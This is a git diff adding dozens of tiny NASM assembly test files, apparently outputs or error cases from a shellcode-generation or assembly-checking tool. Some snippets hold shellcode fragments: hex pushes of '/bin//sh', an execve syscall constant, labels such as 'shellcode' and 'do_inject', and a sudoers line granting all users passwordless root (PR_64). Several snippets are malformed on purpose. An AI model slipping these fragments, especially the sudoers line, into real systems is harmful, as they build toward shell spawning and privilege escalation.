0000000000000000000000000000000000000000..15979f8486bff93e13aabeb7cd970d0c7a1d5d50 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_52.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.asm new file mode 100644 index 0000000000000000000000000000000000000000..fd7ffbba666a64c560c454e49264ebd03bbc6200 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.asm @@ -0,0 +1,14 @@ +section .data + +trasnfer equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push trasnfer + pop ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.obj new file mode 100644 index 0000000000000000000000000000000000000000..a956559b0f1b49c09fc5a790fe593cac9c0cff32 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_522.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.asm new file mode 100644 index 0000000000000000000000000000000000000000..72625ddc4545aaf9820e2dc826ffa86d203255e8 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.asm @@ -0,0 +1,17 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push byte 0x68732f2f + push byte 0x6e69622f + push byte 0x69622f + push byte 0x69622f + push byte 0x69622f + mov ebx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.obj new file mode 100644 index 0000000000000000000000000000000000000000..8ad69e6709fb36c8bafc2ba4a44eaea9a018fecf Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_525.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.asm new file mode 100644 index 0000000000000000000000000000000000000000..99e228b8fa7f55182db87ad732f792d9cdaa6cf7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.obj new file mode 100644 index 0000000000000000000000000000000000000000..2388993cc40472af99a746b1f3a92563cddce60a Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_526.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.asm new file mode 100644 index 0000000000000000000000000000000000000000..f43ccbc247d8961bca44a932bc1207c541553176 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.asm @@ -0,0 +1,24 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push byte 0x50905090 + push 0x50905090 + push 0x50905090 + push 0x50905090 + push 0x50905090 + push 0x50905090 + push 0x50905090 + push 0x509050905090 + push 0x509050905090 + push 0x509050905090 + push 0x509050905090 + push 0x5090509050905090 + push 0x5090 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.obj new file mode 100644 index 0000000000000000000000000000000000000000..b30e84fee831f4abdf16ff575ba225affce91edc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_527.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.asm new file mode 100644 index 0000000000000000000000000000000000000000..a138168ed3a99a7575699617841cbca72f5bca60 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.asm @@ -0,0 +1,13 @@ +section .data + +code equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp code + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.obj new file mode 100644 index 0000000000000000000000000000000000000000..70d375ef3cb942a22d055ce0456963ed257a5722 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_531.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.asm new file mode 100644 index 0000000000000000000000000000000000000000..5a381d3a94a18d582e7d916f6244ecc5d295290b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.asm @@ -0,0 +1,14 @@ +section .data + +_exit equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + je _exit + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.obj new file mode 100644 index 0000000000000000000000000000000000000000..98995d5e1f8f21f95a25b210a3ca6e6bc38b3475 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_535.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.asm new file mode 100644 index 0000000000000000000000000000000000000000..cec9a30e9c15ad37ab1f66dab5923733e62bcc7b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _zero1b: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.obj new file mode 100644 index 0000000000000000000000000000000000000000..1d61e0ab57d9f08ca668a9674332fa0587871bf0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_541.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.asm new file mode 100644 index 0000000000000000000000000000000000000000..49b23eed4d7402e0f88c4db555f1098289eb224e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 0x68732f2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.obj new file mode 100644 index 0000000000000000000000000000000000000000..9dd82208dd5dff63e871a6d1a24842e2f8a3fa70 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_542.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.asm new file mode 100644 index 0000000000000000000000000000000000000000..39c4358beb7482deedb8db7aec7c2720edd68176 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + mul eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.obj new file mode 100644 index 0000000000000000000000000000000000000000..69188b0a99a28f711fcf923e30dd03ced3a48b20 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_546.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.asm new file mode 100644 index 0000000000000000000000000000000000000000..a4026e615214d0395c267e375d31c2f2c9a2706b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push ' -le///sh//sh' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.obj new file mode 100644 index 0000000000000000000000000000000000000000..8c7f28041e6e4d458c2fe784df36bb601022d9a6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_555.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.asm new file mode 100644 index 0000000000000000000000000000000000000000..0687b42304ddb6d717926d9f5d1e3958ff56d229 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.asm @@ -0,0 +1,14 @@ +section .data + +l1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp DWORD [eax], edi + jne l1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.obj new file mode 100644 index 0000000000000000000000000000000000000000..cbbe880c2ffed471ec55570c696b9cd3615943bb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_558.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.asm new file mode 100644 index 0000000000000000000000000000000000000000..d3ade439993098e155d4b216fb20f148faad1759 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.obj new file mode 100644 index 0000000000000000000000000000000000000000..ffddb22f83b9818d78933a4d2de3a1ad7c771cb7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_56.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.asm new file mode 100644 index 0000000000000000000000000000000000000000..ad2c59cc88d5a3ba98f62177495934b1d70db2b1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + ip equ 0x0100007f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.obj new file mode 100644 index 0000000000000000000000000000000000000000..499d03cbd2c78e201aadfd99ce5ef49ff35a14c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_560.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.asm new file mode 100644 index 0000000000000000000000000000000000000000..b4f1d00d6f3202c46bdb860a23c6081e3520090a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.asm @@ -0,0 +1,15 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + xor ebx, ebx + xor ecx, ecx + xor edx, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.obj new file mode 100644 index 0000000000000000000000000000000000000000..7c8dbacbc9ece5edbe4eb9c2d957de96ec4b08a7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_565.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.asm new file mode 100644 index 0000000000000000000000000000000000000000..c0d0597ecd8cce3b96416d1653d3dd35bc8e3b4e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov dl, byte [esi+1] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.obj new file mode 100644 index 0000000000000000000000000000000000000000..83eb6a80322fe2596791de5e7c2ab1f334680ad2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_566.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.asm new file mode 100644 index 0000000000000000000000000000000000000000..d40491e6ab13007fa47964e881d57c57e96b3406 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.asm @@ -0,0 +1,14 @@ +section .data + +__nr_execve equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push __nr_execve + pop eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.obj new file mode 100644 index 0000000000000000000000000000000000000000..f4a2a7d9634fa941301a2cc7157c3ba5eb4a2558 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_567.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.asm new file mode 100644 index 0000000000000000000000000000000000000000..fba3b29ffaad67026b50da3797f0351bedb16621 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.asm @@ -0,0 +1,14 @@ +section .data + +value equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, value -1 + not eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.obj new file mode 100644 index 0000000000000000000000000000000000000000..e9e70a6a30297a7fda03522a4a01d26777888c2f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_568.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.asm new file mode 100644 index 0000000000000000000000000000000000000000..aefde2ffd667d7562679bc5ec28a66f226694a92 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.asm @@ -0,0 +1,13 @@ +section .data + +shellcode equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp shellcode + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.obj new file mode 100644 index 0000000000000000000000000000000000000000..14546375bd581fa40244f2765ca9f6caeb56f74c Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_570.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.asm new file mode 100644 index 0000000000000000000000000000000000000000..f061e08f9d3ca484c5fd20a3b271ceb2ee1b7568 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.asm @@ -0,0 +1,13 @@ +section .data + +exi equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jge exi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.obj new file mode 100644 index 0000000000000000000000000000000000000000..d6c1028a178e85690b179a8fc94db4819fe214f8 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_575.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.asm new file mode 100644 index 0000000000000000000000000000000000000000..2de19ae6b4c97a54fa4fc0d9b53a9966c5bc3191 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, 0x65676760 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.obj new file mode 100644 index 0000000000000000000000000000000000000000..414169f66602f76e13f0acfbcbd9de1d26339660 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_579.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.asm new file mode 100644 index 0000000000000000000000000000000000000000..cc11e16a33498eeb8db13fb8fc995bec4d65b662 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + dec eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.obj new file mode 100644 index 0000000000000000000000000000000000000000..201524ceea4fc91439b5ff9323bbe1ebb90691fe Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_581.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.asm new file mode 100644 index 0000000000000000000000000000000000000000..3323a85379c5d1d6496c43f898bf71ecc18c7662 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + _file_label: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.obj new file mode 100644 index 0000000000000000000000000000000000000000..40e10d215da164f380dce811c9bc1fd9ea72455b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_582.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.asm new file mode 100644 index 0000000000000000000000000000000000000000..dc01f6d3617f3a7f8f86df55dd95e2237f306a71 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.asm @@ -0,0 +1,11 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.obj new file mode 100644 index 0000000000000000000000000000000000000000..2d5ef002b753c875ddb9b7411391f00d41284c13 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_583.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.asm new file mode 100644 index 0000000000000000000000000000000000000000..7ae0794d6d9af59bb8d10216b6cdc6b564bccbf2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.asm @@ -0,0 +1,14 @@ +section .data + +do_inject equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp al, 2 + jne do_inject + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.obj new file mode 100644 index 0000000000000000000000000000000000000000..c21166b6f7638e330aaf2cac1a0ae0aaf92cca63 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_585.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.asm new file mode 100644 index 0000000000000000000000000000000000000000..0c7c56338bf180d2f36f6552b1ed640895b7f047 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.asm @@ -0,0 +1,13 @@ +section .data + +exit equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jne exit + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.obj new file mode 100644 index 0000000000000000000000000000000000000000..b091dbadef0c0205e20664dfd618a1d3a157045b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_587.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.asm new file mode 100644 index 0000000000000000000000000000000000000000..29c5a34cdb62556fa4af9f0f4605ae5b5591ef00 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.asm @@ -0,0 +1,27 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push edx + push 0x68732f + push 0x68732f + push 0x6e69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x69622f + push 0x + + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.obj new file mode 100644 index 0000000000000000000000000000000000000000..20cc584809c5993cbdb50fb6aa8d4737d87a212f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_590.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.asm new file mode 100644 index 0000000000000000000000000000000000000000..4817ee4f62d245fe45c675184d6f7b17eeb7a8f5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.asm @@ -0,0 +1,13 @@ +section .data + +af_inet6 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push af_inet6 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.obj new file mode 100644 index 0000000000000000000000000000000000000000..11991ec3c5cd1d7361a3ba01188b64298619a358 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_63.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.asm new file mode 100644 index 0000000000000000000000000000000000000000..afbd84320dfbd03677523de744ad8cb41cbd4f04 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + db 'all all=(all) nopasswd: all' + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.obj new file mode 100644 index 0000000000000000000000000000000000000000..a427653ea3859182ab1fb0fd5167eb53857ee4c7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/PR_64.obj differ diff --git 